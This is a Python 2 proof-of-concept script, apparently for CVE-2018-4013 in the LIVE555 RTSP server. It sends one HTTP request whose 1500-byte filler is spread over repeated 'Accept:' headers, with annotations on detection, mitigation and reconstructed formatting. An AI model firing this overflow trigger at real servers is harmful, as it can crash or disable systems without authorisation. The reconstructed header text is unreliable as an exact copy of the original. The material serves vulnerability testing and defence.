# Proof-of-concept request generator; its own usage string names it
# cve-2018-4013.py.  The script is Python 2 (print statement, str passed
# straight to socket.send()).
#
# What the code does: it builds one HTTP GET request whose filler payload is
# spread over many repeated "Accept:" header lines of 50 characters each, then
# sends that request to the given IP and port over a single TCP connection.
#
# NOTE(review): per the public advisory, this CVE id is a stack buffer
# overflow in the HTTP request-header parsing of the LIVE555 RTSP server
# library -- confirm against the advisory before relying on this description.
#
# Defender notes:
#   * Detection: a single request carrying dozens of "Accept:" lines with
#     uniform 50-byte filler values is not normal client behaviour; the
#     default payload below produces 30 such lines.
#   * Mitigation: run a release of the affected server that contains the
#     vendor fix, and do not expose the HTTP-tunnelling port to untrusted
#     networks where it is not needed.
#
# NOTE(review): the page this was taken from had the whole script collapsed
# onto one line; indentation and line breaks below are reconstructed.
import socket
import sys
import re


def genHeader(raw):
    """Return an HTTP GET request that carries *raw* in repeated Accept headers.

    raw: filler string to embed.  Values shorter than 50 characters go into a
    single Accept header; longer values are cut into 50-character pieces, one
    Accept header line per piece, with any remainder in a final Accept line.

    Returns the full request text, terminated by a blank line (CRLF CRLF).
    """
    # Fixed request line and headers.  The Host value is hard-coded and does
    # not follow the target passed on the command line.
    # NOTE(review): whitespace inside this literal is reproduced exactly as it
    # appears on the page (single spaces); the original file most likely had
    # line breaks between the header lines -- confirm against the upstream copy.
    header = ''' GET / HTTP/1.1\r\n Host: 127.0.0.1:8000\r\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\r\n Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3\r\n Accept-Encoding: gzip, deflate\r\n Connection: keep-alive\r\n Upgrade-Insecure-Requests: 1\r\n '''
    header += "Accept:"
    if len(raw) < 50:
        # Short input: one Accept header holds everything.
        result = raw
    else:
        # '.' does not match a newline, so this chunking only covers the whole
        # input when raw contains no line breaks.
        group = re.findall(r'.{50}',raw)
        # Each 50-character piece becomes its own "Accept:" header line.
        result = "\r\nAccept:".join(group)
        if len(raw)%50:
            # Trailing piece shorter than 50 characters gets a last Accept line.
            result += "\r\nAccept:" + raw[len(raw)-len(raw)%50:]
    header += result
    # Blank line marks the end of the HTTP header section.
    header +="\r\n\r\n"
    return header


def exploit(target,port,payload):
    """Open a TCP connection to (target, port) and send the generated request.

    The request is sent once.  No response is read and the socket is never
    closed explicitly, so the script itself reports nothing about how the
    server reacted; the effect has to be observed on the server side.
    """
    sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sock.connect((target,port))
    raw = genHeader(payload)
    # Debug aid left disabled by the author: dump the request before sending.
    # print raw
    sock.send(raw)
    # Reading the reply is also left disabled by the author.
    # response = sock.recv(4096)


if __name__ == "__main__":
    # Expects exactly the two positional arguments named in the usage text.
    if len(sys.argv)<3:
        print "usage: python cve-2018-4013.py IP PORT"
    else:
        # 1500 bytes of the letter 'a': filler only, no instructions or
        # addresses.  As written this tests whether the parser overruns its
        # buffer (a crash or hang on an unpatched server), nothing more.
        payload = "a"*1500
        exploit(sys.argv[1],int(sys.argv[2]),payload)